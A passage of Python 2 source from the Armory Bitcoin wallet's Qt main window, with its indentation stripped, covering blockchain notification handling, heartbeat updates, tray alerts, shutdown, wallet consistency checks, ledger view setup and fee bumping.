elif self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Node offline (%2 blocks)</b></font> ').arg(\
htmlColor('TextRed')).arg(TheBDM.getTopBlockHeight()))
def getToolTipTextOffline():
blkRecvAgo = RightNow() - self.blkReceived
tt = self.tr(
'Disconnected from Bitcoin Node, cannot update history '
'<br><br>Last known block: %1 <br>Received %2 ago').arg(TheBDM.getTopBlockHeight()).arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOffline)
#############################################################################
def handleCppNotification(self, action, args):
if action == FINISH_LOAD_BLOCKCHAIN_ACTION:
#Blockchain just finished loading, finish initializing UI and render the
#ledgers
self.nodeStatus = TheBDM.bdv().getNodeStatus()
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
for wltid in self.walletMap:
self.walletMap[wltid].detectHighestUsedIndex()
self.blkReceived = RightNow()
if self.needUpdateAfterScan:
LOGDEBUG('Running finishLoadBlockchain')
self.finishLoadBlockchainGUI()
self.needUpdateAfterScan = False
self.setDashboardDetails()
self.updateStatusBarText()
elif action == NEW_ZC_ACTION and not CLI_OPTIONS.ignoreZC:
#A zero conf Tx conerns one of the address Armory is tracking, pull the
#updated ledgers from the BDM and create the related notifications.
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
self.notifyNewZeroConf(args)
self.createCombinedLedger()
elif action == NEW_BLOCK_ACTION:
#A new block has appeared, pull updated ledgers from the BDM, display
#the new block height in the status bar and note the block received time
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
newBlocks = args[0]
if newBlocks>0:
print 'New Block: ', TheBDM.getTopBlockHeight()
self.ledgerModel.reset()
LOGINFO('New Block! : %d', TheBDM.getTopBlockHeight())
self.createCombinedLedger()
self.blkReceived = RightNow()
self.writeSetting('LastBlkRecvTime', self.blkReceived)
self.writeSetting('LastBlkRecv', TheBDM.getTopBlockHeight())
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
# Update the wallet view to immediately reflect new balances
self.walletModel.reset()
self.updateStatusBarText()
elif action == REFRESH_ACTION:
#The wallet ledgers have been updated from an event outside of new ZC
#or new blocks (usually a wallet or address was imported, or the
#wallet filter was modified)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
reset = False
if len(args) == 0:
self.createCombinedLedger()
return
for wltID in args:
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.isEnabled = True
self.walletModel.reset()
wlt.doAfterScan()
self.changeWltFilter()
if wltID in self.oneTimeScanAction:
postScanAction = self.oneTimeScanAction[wltID]
del self.oneTimeScanAction[wltID]
if callable(postScanAction):
postScanAction()
elif wltID in self.lockboxIDMap:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = True
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.changeLBFilter()
elif wltID == "wallet_filter_changed":
reset = True
if self.walletSideScanProgress.has_key(wltID):
del self.walletSideScanProgress[wltID]
self.createCombinedLedger(reset)
elif action == WARNING_ACTION:
#something went wrong on the C++ side, create a message box to report
#it to the user
if 'rescan' in args[0].lower() or 'rebuild' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Rebuild and rescan on next start"), dnaaStartChk=False)
if result[1] == True:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
elif 'factory reset' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Factory reset on next start"), dnaaStartChk=False)
if result[1] == True:
DlgFactoryReset(self, self).exec_()
else:
QMessageBox.critical(self, self.tr('BlockDataManager Warning'), \
args[0], \
QMessageBox.Ok)
#this is a critical error reporting channel, should kill the app right
#after
os._exit(0)
elif action == SCAN_ACTION:
wltIDList = args[0]
prog = args[1]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = prog*100
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.disableWalletUI()
if wltID in self.walletDialogDict:
self.walletDialogDict[wltID].reject()
del self.walletDialogDict[wltID]
hasWallet = True
else:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = False
hasLockbox = True
self.walletModel.reset()
if hasWallet:
self.changeWltFilter()
if hasLockbox:
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.resetLBSelection()
self.lbDialog.changeLBFilter()
elif action == NODESTATUS_UPDATE:
prevStatus = None
if self.nodeStatus != None:
prevStatus = self.nodeStatus.status_
self.nodeStatus = args[0]
TheSDM.updateState(self.nodeStatus)
if prevStatus != self.nodeStatus.status_:
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
if self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.showTrayMsg(self.tr('Disconnected'), self.tr('Connection to Bitcoin Core '
'client lost! Armory cannot send nor '
'receive bitcoins until connection is '
're-established.'), QSystemTrayIcon.Critical,
10000)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Online:
self.showTrayMsg(self.tr('Connected'), self.tr('Connection to Bitcoin Core '
're-established'), \
QSystemTrayIcon.Information, 10000)
self.updateStatusBarText()
self.updateSyncProgress()
elif action == BDM_SCAN_PROGRESS:
self.setDashboardDetails()
self.updateSyncProgress()
elif action == BDV_ERROR:
errorStruct = args[0]
if errorStruct.errType_ == Cpp.Error_ZC:
errorMsg = errorStruct.errorStr_
txHash = errorStruct.extraMsg_
self.zcBroadcastError(txHash, errorMsg)
#############################################################################
def Heartbeat(self, nextBeatSec=1):
"""
This method is invoked when the app is initialized, and will
run every second, or whatever is specified in the nextBeatSec
argument.
"""
# Special heartbeat functions are for special windows that may need
# to update every, say, every 0.1s
# is all that matters at that moment, like a download progress window.
# This is "special" because you are putting all other processing on
# hold while this special window is active
# IMPORTANT: Make sure that the special heartbeat function returns
# a value below zero when it's done OR if it errors out!
# Otherwise, it should return the next heartbeat delay,
# which would probably be something like 0.1 for a rapidly
# updating progress counter
for fn in self.extraHeartbeatSpecial:
try:
nextBeat = fn()
if nextBeat>0:
reactor.callLater(nextBeat, self.Heartbeat)
else:
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
except:
LOGEXCEPT('Error in special heartbeat function')
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
return
if TheBDM.exception != "":
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'The DB has returned the following error: <br><br> '
'<b> %1 </b> <br><br> Armory will now shutdown.').arg(TheBDM.exception), QMessageBox.Ok)
self.closeForReal()
# SatoshiDaemonManager
# BlockDataManager
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
self.heartbeatCount += 1
try:
for func in self.extraHeartbeatAlways:
if isinstance(func, list):
fnc = func[0]
kargs = func[1]
keep_running = func[2]
if keep_running == False:
self.extraHeartbeatAlways.remove(func)
fnc(*kargs)
else:
func()
if self.doAutoBitcoind:
if (sdmState in ['BitcoindInitializing','BitcoindSynchronizing']) or \
(sdmState == 'BitcoindReady' and bdmState==BDM_SCANNING):
self.updateSyncProgress()
else:
if bdmState in (BDM_OFFLINE,BDM_UNINITIALIZED):
# This call seems out of place, but it's because if you are in offline
# mode, it needs to check periodically for the existence of Bitcoin Core
# so that it can enable the "Go Online" button
self.setDashboardDetails()
return
elif bdmState==BDM_SCANNING: # TODO - Move to handle cpp notification
self.updateSyncProgress()
if self.netMode==NETWORKMODE.Disconnected:
if self.isOnlineModePossible():
self.switchNetworkMode(NETWORKMODE.Full)
if bdmState==BDM_BLOCKCHAIN_READY:
# Trigger any notifications, if we have them... TODO - Remove add to new block, and block chain ready
self.doTheSystemTrayThing()
# Any extra functions that may have been injected to be run TODO - Call on New block
# when new blocks are received.
if len(self.extraNewBlockFunctions) > 0:
cppHead = TheBDM.getMainBlockFromDB(self.currBlockNum)
pyBlock = PyBlock().unserialize(cppHead.getSerializedBlock())
for blockFunc in self.extraNewBlockFunctions:
blockFunc(pyBlock)
# TODO - remove
for func in self.extraHeartbeatOnline:
func()
except:
# When getting the error info, don't collect the traceback in order to
# avoid circular references. https://docs.python.org/2/library/sys.html
# has more info.
LOGEXCEPT('Error in heartbeat function')
(errType, errVal) = sys.exc_info()[:2]
errStr = 'Error Type: %s\nError Value: %s' % (errType, errVal)
LOGERROR(errStr)
finally:
reactor.callLater(nextBeatSec, self.Heartbeat)
#############################################################################
def printAlert(self, moneyID, ledgerAmt, txAmt):
'''
Function that prints a notification for a transaction that affects an
address we control.
'''
dispLines = QStringList()
title = ''
totalStr = coin2strNZS(txAmt)
if moneyID in self.walletMap:
wlt = self.walletMap[moneyID]
if len(wlt.labelName) <= 20:
dispName = '"%(name)s"' % { 'name' : wlt.labelName }
else:
dispName = '"%(shortname)s..."' % { 'shortname' : wlt.labelName[:17] }
dispName = self.tr('Wallet %1 (%2)').arg(dispName, wlt.uniqueIDB58)
elif moneyID in self.cppLockboxWltMap:
lbox = self.getLockboxByID(moneyID)
if len(lbox.shortName) <= 20:
dispName = '%(M)d-of-%(N)d "%(shortname)s"' % { 'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName}
else:
dispName = ('%(M)d-of-%(N)d "%(shortname)s..."') % {'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName[:17] }
dispName = self.tr('Lockbox %1 (%2)').arg(dispName, lbox.uniqueIDB58)
else:
LOGERROR('Asked to show notification for wlt/lbox we do not have')
return
# Collected everything we need to display, now construct it and do it.
if ledgerAmt > 0:
# Received!
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr ))
dispLines.append(self.tr('Recipient: %1').arg(dispName))
elif ledgerAmt < 0:
# Sent!
title = self.tr('Bitcoins Sent!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('Sender: %1').arg(dispName))
self.showTrayMsg(title, dispLines.join('\n'), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title)
#############################################################################
def doTheSystemTrayThing(self):
"""
I named this method as it is because this is not just "show a message."
I need to display all relevant transactions, in sequence that they were
received. I will store them in self.notifyQueue, and this method will
do nothing if it's empty.
"""
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY or \
RightNow()<self.notifyBlockedUntil:
return
# Notify queue input is: [WltID/LBID, LedgerEntry, alreadyNotified]
for i in range(len(self.notifyQueue)):
moneyID, le, alreadyNotified = self.notifyQueue[i]
# Skip the ones we've notified of already.
if alreadyNotified:
continue
# Marke it alreadyNotified=True
self.notifyQueue[i][2] = True
# Catch condition that somehow the tx isn't related to us
if le.getTxHash()=='\x00'*32:
continue
# Make sure the wallet ID or lockbox ID keys are actually valid before
# using them to grab the appropriate C++ wallet.
pywlt = self.walletMap.get(moneyID)
lbox = self.getLockboxByID(moneyID)
# If we couldn't find a matching wallet or lbox, bail
if pywlt is None and lbox is None:
LOGERROR('Could not find moneyID = %s; skipping notify' % moneyID)
continue
if pywlt:
wname = self.walletMap[moneyID].labelName
if len(wname)>20:
wname = wname[:17] + '...'
wltName = self.tr('Wallet "%1" (%2)').arg(wname, moneyID)
else:
lbox = self.getLockboxByID(moneyID)
M = self.getLockboxByID(moneyID).M
N = self.getLockboxByID(moneyID).N
lname = self.getLockboxByID(moneyID).shortName
if len(lname) > 20:
lname = lname[:17] + '...'
wltName = self.tr('Lockbox %1-of-%2 "%3" (%4)').arg(M).arg(N).arg(lname, moneyID)
if le.isSentToSelf():
# Used to display the sent-to-self amount, but if this is a lockbox
# we only have a cppWallet, and the determineSentToSelfAmt() func
# only operates on python wallets. Oh well, the user can double-
# click on the tx in their ledger if they want to see what's in it.
# amt = determineSentToSelfAmt(le, cppWlt)[0]
# self.showTrayMsg('Your bitcoins just did a lap!', \
# 'Wallet "%s" (%s) just sent %s BTC to itself!' % \
# (wlt.labelName, moneyID, coin2str(amt,maxZeros=1).strip()),
self.showTrayMsg(self.tr('Your bitcoins just did a lap!'), \
self.tr('%1 just sent some BTC to itself!').arg(wltName), \
QSystemTrayIcon.Information, 10000)
return
# If coins were either received or sent from the loaded wlt/lbox
dispLines = QStringList()
totalStr = coin2strNZS(abs(le.getValue()))
title = None
if le.getValue() > 0:
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('From: %2').arg(wltName))
elif le.getValue() < 0:
try:
recipStr = ''
for addr in le.getScrAddrList():
if pywlt.hasScrAddr(addr):
continue
if len(recipStr)==0:
recipStr = scrAddr_to_addrStr(addr)
else:
recipStr = self.tr('<Multiple Recipients>')
title = self.tr('Bitcoins Sent!')
dispLines.append(unicode(self.tr('Amount: %1 BTC').arg(totalStr)))
dispLines.append(unicode(self.tr('From: %1').arg(wltName )))
dispLines.append(unicode(self.tr('To: %1').arg(recipStr)))
except Exception as e:
LOGERROR('tx broadcast systray display failed with error: %s' % e)
if title:
self.showTrayMsg(title, dispLines.join("\n"), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title + '\n' + dispLines.join("\n"))
# Wait for 5 seconds before processing the next queue object.
self.notifyBlockedUntil = RightNow() + 5
return
#############################################################################
def closeEvent(self, event=None):
moc = self.getSettingOrSetDefault('MinimizeOrClose', 'DontKnow')
doClose, doMinimize = False, False
if moc=='DontKnow':
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Minimize or Close'), \
self.tr('Would you like to minimize Armory to the system tray instead '
'of closing it?'), dnaaMsg=self.tr('Remember my answer'), \
yesStr=self.tr('Minimize'), noStr=self.tr('Close'))
if reply==True:
doMinimize = True
if remember:
self.writeSetting('MinimizeOrClose', 'Minimize')
else:
doClose = True;
if remember:
self.writeSetting('MinimizeOrClose', 'Close')
if doMinimize or moc=='Minimize':
self.minimizeArmory()
if event:
event.ignore()
elif doClose or moc=='Close':
self.doShutdown = True
self.sysTray.hide()
self.closeForReal()
event.ignore()
else:
return # how would we get here?
#############################################################################
def unpackLinuxTarGz(self, targzFile, changeSettings=True):
if targzFile is None:
return None
if not os.path.exists(targzFile):
return None
unpackDir = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInst')
unpackDir2 = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInstOld')
if os.path.exists(unpackDir):
if os.path.exists(unpackDir2):
shutil.rmtree(unpackDir2)
shutil.move(unpackDir, unpackDir2)
os.mkdir(unpackDir)
out,err = execAndWait('tar -zxf %s -C %s' % (targzFile, unpackDir), \
timeout=5)
LOGINFO('UNPACK STDOUT: "' + out + '"')
LOGINFO('UNPACK STDERR: "' + err + '"')
# There should only be one subdir
unpackDirChild = None
for fn in os.listdir(unpackDir):
unpackDirChild = os.path.join(unpackDir, fn)
if unpackDirChild is None:
LOGERROR('There was apparently an error unpacking the file')
return None
finalDir = os.path.abspath(unpackDirChild)
LOGWARN('Bitcoin Core unpacked into: %s', finalDir)
if changeSettings:
self.settings.set('SatoshiExe', finalDir)
return finalDir
#############################################################################
def closeForReal(self):
'''
Unlike File->Quit or clicking the X on the window, which may actually
minimize Armory, this method is for *really* closing Armory
'''
self.setCursor(Qt.WaitCursor)
self.showShuttingDownMessage()
try:
# Save the main window geometry in the settings file
try:
self.writeSetting('MainGeometry', str(self.saveGeometry().toHex()))
self.writeSetting('MainWalletCols', saveTableView(self.walletsView))
self.writeSetting('MainLedgerCols', saveTableView(self.ledgerView))
except:
pass
if TheBDM.getState()==BDM_SCANNING:
LOGINFO('BDM state is scanning -- force shutdown BDM')
else:
LOGINFO('BDM is safe for clean shutdown')
TheSDM.stopBitcoind()
TheBDM.shutdown()
# Remove Temp Modules Directory if it exists:
if self.tempModulesDirName:
shutil.rmtree(self.tempModulesDirName)
except:
# Don't want a strange error here interrupt shutdown
LOGEXCEPT('Strange error during shutdown')
LOGINFO('Attempting to close the main window!')
self.signalExecution.executeMethod(QAPP.quit)
#############################################################################
def execTrigger(self, toSpawn):
super(ArmoryDialog, toSpawn).exec_()
#############################################################################
def initTrigger(self, toInit):
if isinstance(toInit, DlgProgress):
toInit.setup(self)
toInit.status = 1
#############################################################################
def checkForNegImports(self):
negativeImports = []
for wlt in self.walletMap:
if self.walletMap[wlt].hasNegativeImports:
negativeImports.append(self.walletMap[wlt].uniqueIDB58)
# If we detect any negative import
if len(negativeImports) > 0:
logDirs = []
for wltID in negativeImports:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
wltlogdir = os.path.join(homedir, wltID)
if not os.path.exists(wltlogdir):
continue
for subdirname in os.listdir(wltlogdir):
subdirpath = os.path.join(wltlogdir, subdirname)
logDirs.append([wltID, subdirpath])
DlgInconsistentWltReport(self, self, logDirs).exec_()
#############################################################################
def getAllRecoveryLogDirs(self, wltIDList):
self.logDirs = []
for wltID in wltIDList:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
logdir = os.path.join(homedir, wltID)
if not os.path.exists(logdir):
continue
self.logDirs.append([wltID, logdir])
return self.logDirs
#############################################################################
@AllowAsync
def CheckWalletConsistency(self, wallets, prgAt=None):
if prgAt:
totalSize = 0
walletSize = {}
for wlt in wallets:
statinfo = os.stat(wallets[wlt].walletPath)
walletSize[wlt] = statinfo.st_size
totalSize = totalSize + statinfo.st_size
i=0
dlgrdy = [0]
nerrors = 0
for wlt in wallets:
if prgAt:
prgAt[0] = i
f = 10000*walletSize[wlt]/totalSize
prgAt[1] = f
i = f +i
self.wltCstStatus = WalletConsistencyCheck(wallets[wlt], prgAt)
if self.wltCstStatus[0] != 0:
self.WltCstError(wallets[wlt], self.wltCstStatus[1], dlgrdy)
while not dlgrdy[0]:
time.sleep(0.01)
nerrors = nerrors +1
prgAt[2] = 1
dlgrdy[0] = 0
while prgAt[2] != 2:
time.sleep(0.1)
if nerrors == 0:
self.emit(SIGNAL('UWCS'), [1, self.tr('All wallets are consistent'), 10000, dlgrdy])
self.emit(SIGNAL('checkForNegImports'))
else:
while not dlgrdy:
self.emit(SIGNAL('UWCS'), [1, self.tr('Consistency Check Failed!'), 0, dlgrdy])
time.sleep(1)
self.checkRdyForFix()
def checkRdyForFix(self):
#check BDM first
time.sleep(1)
self.dlgCptWlt.emit(SIGNAL('Show'))
while 1:
if TheBDM.getState() == BDM_SCANNING:
canFix = self.tr(
'The wallet analysis tool will become available '
'as soon as Armory is done loading. You can close this '
'window and it will reappear when ready.')
self.dlgCptWlt.UpdateCanFix([canFix])
time.sleep(1)
elif TheBDM.getState() == BDM_OFFLINE or \
TheBDM.getState() == BDM_UNINITIALIZED:
TheSDM.setDisabled(True)
CLI_OPTIONS.offline = True
break
else:
break
#check running dialogs
self.dlgCptWlt.emit(SIGNAL('Show'))
runningList = []
while 1:
listchanged = 0
canFix = []
for dlg in runningList:
if dlg not in runningDialogsList:
runningList.remove(dlg)
listchanged = 1
for dlg in runningDialogsList:
if not isinstance(dlg, DlgCorruptWallet):
if dlg not in runningList:
runningList.append(dlg)
listchanged = 1
if len(runningList):
if listchanged:
canFix.append(self.tr(
'<b>The following dialogs need closed before you can '
'run the wallet analysis tool:</b>'))
canFix.extend([str(myobj.windowTitle()) for myobj in runningList])
self.dlgCptWlt.UpdateCanFix(canFix)
time.sleep(0.2)
else:
break
canFix.append('Ready to analyze inconsistent wallets!')
self.dlgCptWlt.UpdateCanFix(canFix, True)
self.dlgCptWlt.exec_()
def checkWallets(self):
nwallets = len(self.walletMap)
if nwallets > 0:
self.prgAt = [0, 0, 0]
self.pbarWalletProgress = QProgressBar()
self.pbarWalletProgress.setMaximum(10000)
self.pbarWalletProgress.setMaximumSize(300, 22)
self.pbarWalletProgress.setStyleSheet('text-align: center; margin-bottom: 2px; margin-left: 10px;')
self.pbarWalletProgress.setFormat(self.tr('Wallet Consistency Check: %p%'))
self.pbarWalletProgress.setValue(0)
self.statusBar().addWidget(self.pbarWalletProgress)
self.connect(self, SIGNAL('UWCS'), self.UpdateWalletConsistencyStatus)
self.connect(self, SIGNAL('PWCE'), self.PromptWltCstError)
self.CheckWalletConsistency(self.walletMap, self.prgAt, async=True)
self.UpdateConsistencyCheckMessage(async = True)
@AllowAsync
def UpdateConsistencyCheckMessage(self):
while self.prgAt[2] == 0:
self.emit(SIGNAL('UWCS'), [0, self.prgAt[0]])
time.sleep(0.5)
self.emit(SIGNAL('UWCS'), [2])
self.prgAt[2] = 2
def UpdateWalletConsistencyStatus(self, msg):
if msg[0] == 0:
self.pbarWalletProgress.setValue(msg[1])
elif msg[0] == 1:
self.statusBar().showMessage(msg[1], msg[2])
msg[3][0] = 1
else:
self.pbarWalletProgress.hide()
def WltCstError(self, wlt, status, dlgrdy):
self.emit(SIGNAL('PWCE'), dlgrdy, wlt, status)
LOGERROR('Wallet consistency check failed! (%s)', wlt.uniqueIDB58)
def PromptWltCstError(self, dlgrdy, wallet=None, status='', mode=None):
if not self.dlgCptWlt:
self.dlgCptWlt = DlgCorruptWallet(wallet, status, self, self)
dlgrdy[0] = 1
else:
self.dlgCptWlt.addStatus(wallet, status)
if not mode:
self.dlgCptWlt.show()
else:
self.dlgCptWlt.exec_()
#############################################################################
def loadNewPage(self):
pageInt = int(self.PageLineEdit.text())
if pageInt == self.mainLedgerCurrentPage:
return
if pageInt < 0 or pageInt > TheBDM.bdv().getWalletsPageCount():
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
return
previousPage = self.mainLedgerCurrentPage
try:
self.mainLedgerCurrentPage = pageInt
self.createCombinedLedger()
except:
self.mainLedgerCurrentPage = previousPage
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
#############################################################################
# System tray notifications require specific code for OS X. We'll handle
# messages here to hide the ugliness.
def showTrayMsg(self, dispTitle, dispText, dispIconType, dispTime):
if not OS_MACOSX:
self.sysTray.showMessage(dispTitle, dispText, dispIconType, dispTime)
else:
# Code supporting Growl (OSX 10.7) is buggy, and no one seems to care.
# Just jump straight to 10.8.
self.macNotifHdlr.showNotification(dispTitle, dispText)
#############################################################################
def bdv(self):
return TheBDM.bdv()
#############################################################################
def setupBDV(self):
if self.netMode == NETWORKMODE.Offline:
return
try:
TheBDM.registerBDV()
self.walletManager.setBDVObject(TheBDM.bdv())
except:
self.switchNetworkMode(NETWORKMODE.Offline)
return
for wltId in self.walletMap:
self.walletMap[wltId].registerWallet()
for lbObj in self.allLockboxes:
lbID = lbObj.uniqueIDB58
scrAddrList = lbObj.getScrAddrList()
self.cppLockboxWltMap[lbID] = lbObj.registerLockbox(scrAddrList, False)
#############################################################################
def startBlockchainProcessingInitialization(self):
self.startBitcoindIfNecessary()
self.completeBlockchainProcessingInitialization()
#############################################################################
def completeBlockchainProcessingInitialization(self):
if CLI_OPTIONS.offline:
return
gotDB = self.startArmoryDBIfNecessary()
if gotDB == False:
TheBDM.setState(BDM_OFFLINE)
self.switchNetworkMode(NETWORKMODE.Offline)
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'Armory failed to spawn the DB!<br> '
'Continuing operations in offline mode instead. <br> '
'Refer to the dbLog.txt for more information.'), QMessageBox.Ok)
self.setDashboardDetails()
return
else:
self.switchNetworkMode(NETWORKMODE.Full)
TheBDM.instantiateBDV(armoryengine.ArmoryUtils.ARMORYDB_PORT)
self.setupBDV()
self.setupLedgerViews()
self.loadBlockchainIfNecessary()
self.setDashboardDetails()
#############################################################################
def setupLedgerViews(self):
if self.netMode == NETWORKMODE.Offline:
return
# Table to display ledger/activity
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.ledgerTable = []
self.ledgerModel = LedgerDispModelSimple(self.ledgerTable, self, self)
self.ledgerModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForWallets())
self.ledgerModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.frmLedgUpDown = QFrame()
self.ledgerView = ArmoryTableView(self, self, self.frmLedgUpDown)
self.ledgerView.setModel(self.ledgerModel)
self.ledgerView.setSortingEnabled(True)
self.ledgerView.setItemDelegate(LedgerDispDelegate(self))
self.ledgerView.setSelectionBehavior(QTableView.SelectRows)
self.ledgerView.setSelectionMode(QTableView.SingleSelection)
self.ledgerView.verticalHeader().setDefaultSectionSize(sectionSz)
self.ledgerView.verticalHeader().hide()
self.ledgerView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.ledgerView.horizontalHeader().setResizeMode(3, QHeaderView.Fixed)
self.ledgerView.hideColumn(LEDGERCOLS.isOther)
self.ledgerView.hideColumn(LEDGERCOLS.UnixTime)
self.ledgerView.hideColumn(LEDGERCOLS.WltID)
self.ledgerView.hideColumn(LEDGERCOLS.TxHash)
self.ledgerView.hideColumn(LEDGERCOLS.isCoinbase)
self.ledgerView.hideColumn(LEDGERCOLS.toSelf)
self.ledgerView.hideColumn(LEDGERCOLS.optInRBF)
# Another table and model, for lockboxes
self.currentLBPage = 0
self.lockboxLedgTable = []
self.lockboxLedgModel = LedgerDispModelSimple(self.lockboxLedgTable,
self, self, isLboxModel=True)
self.lockboxLedgModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForLockboxes())
self.lockboxLedgModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.lbDialogModel = None
dateWidth = tightSizeStr(self.ledgerView, '_9999-Dec-99 99:99pm__')[0]
cWidth = 20 # num-confirm icon width
tWidth = 72 # date icon width
initialColResize(self.ledgerView, [cWidth, 0, dateWidth, tWidth, 0.30, 0.40, 0.3])
self.connect(self.ledgerView, SIGNAL('doubleClicked(QModelIndex)'), \
self.dblClickLedger)
self.ledgerView.setContextMenuPolicy(Qt.CustomContextMenu)
self.ledgerView.customContextMenuRequested.connect(self.showContextMenuLedger)
self.connect(self.ledgerView.horizontalHeader(), \
SIGNAL('sortIndicatorChanged(int,Qt::SortOrder)'), \
self.changeLedgerSorting)
#page selection UI
self.mainLedgerCurrentPage = 1
self.lblPages = QRichLabel('Page: ')
self.PageLineEdit = QLineEdit('1')
self.lblNPages = QRichLabel(' out of 1')
self.connect(self.PageLineEdit, SIGNAL('editingFinished()'), \
self.loadNewPage)
self.changeWltFilter()
# Will fill this in when ledgers are created & combined
self.lblLedgShowing = QRichLabel('Showing:', hAlign=Qt.AlignHCenter)
self.lblLedgRange = QRichLabel('', hAlign=Qt.AlignHCenter)
self.lblLedgTotal = QRichLabel('', hAlign=Qt.AlignHCenter)
self.comboNumShow = QComboBox()
for s in self.numShowOpts:
self.comboNumShow.addItem( str(s) )
self.comboNumShow.setCurrentIndex(0)
self.comboNumShow.setMaximumWidth( tightSizeStr(self, '_9999_')[0]+25 )
self.btnLedgUp = QLabelButton('')
self.btnLedgUp.setMaximumHeight(20)
self.btnLedgUp.setPixmap(QPixmap(':/scroll_up_18.png'))
self.btnLedgUp.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.btnLedgUp.setVisible(False)
self.btnLedgDn = QLabelButton('')
self.btnLedgDn.setMaximumHeight(20)
self.btnLedgDn.setPixmap(QPixmap(':/scroll_down_18.png'))
self.btnLedgDn.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.connect(self.comboNumShow, SIGNAL('activated(int)'), self.changeNumShow)
self.connect(self.btnLedgUp, SIGNAL('clicked()'), self.clickLedgUp)
self.connect(self.btnLedgDn, SIGNAL('clicked()'), self.clickLedgDn)
frmFilter = makeVertFrame([QLabel(self.tr('Filter:')), self.comboWltSelect, 'Stretch'])
frmLower = makeHorizFrame([ frmFilter, \
'Stretch', \
self.frmLedgUpDown, \
'Stretch', \
self.frmTotals])
# Now add the ledger to the bottom of the window
ledgLayout = QGridLayout()
ledgLayout.addWidget(self.ledgerView, 1,0)
ledgLayout.addWidget(frmLower, 2,0)
ledgLayout.setRowStretch(0, 0)
ledgLayout.setRowStretch(1, 1)
ledgLayout.setRowStretch(2, 0)
self.tabActivity = QWidget()
self.tabActivity.setLayout(ledgLayout)
self.mainDisplayTabs.addTab(self.tabActivity, self.tr('Transactions'))
hexledgsz = self.settings.get('MainLedgerCols')
if len(hexledgsz)>0:
restoreTableView(self.ledgerView, hexledgsz)
self.ledgerView.setColumnWidth(LEDGERCOLS.NumConf, 20)
self.ledgerView.setColumnWidth(LEDGERCOLS.TxDir, 72)
#############################################################################
def bumpFee(self, walletId, txHash):
#grab wallet
wlt = self.walletMap[walletId]
#grab ZC from DB
zctx = TheBDM.bdv().getTxByHash(txHash)
pytx = PyTx().unserialize(zctx.serialize())
#create tx batch
batch = Cpp.TransactionBatch()
for txin in pytx.inputs:
outpoint = txin.outpoint
batch.addSpender(binary_to_hex(outpoint.txHash), \
outpoint.txOutIndex, txin.intSeq)
for txout in pytx.outputs:
script = txout.getScript()
scrAddr = BtcUtils().getScrAddrForScript(script)
addrComment = wlt.getCommentForAddress(scrAddr)
b58Addr = scrAddr_to_addrStr(scrAddr)
if addrComment == CHANGE_ADDR_DESCR_STRING:
#change address
batch.setChange(b58Addr)
else:
#recipient
batch.addRecipient(b58Addr, txout.value)
batch.setWalletID(walletId)
#feed batch to spend dlg
batchStr = batch.serialize()
dlgSpend = DlgSendBitcoins(None, self, self)
dlgSpend.frame.prefillFromBatch(batchStr)
dlgSpend.exec_()
#############################################################################
def walletTimeoutCheck(self):
for idx,wltID in enumerate(self.walletIDList):
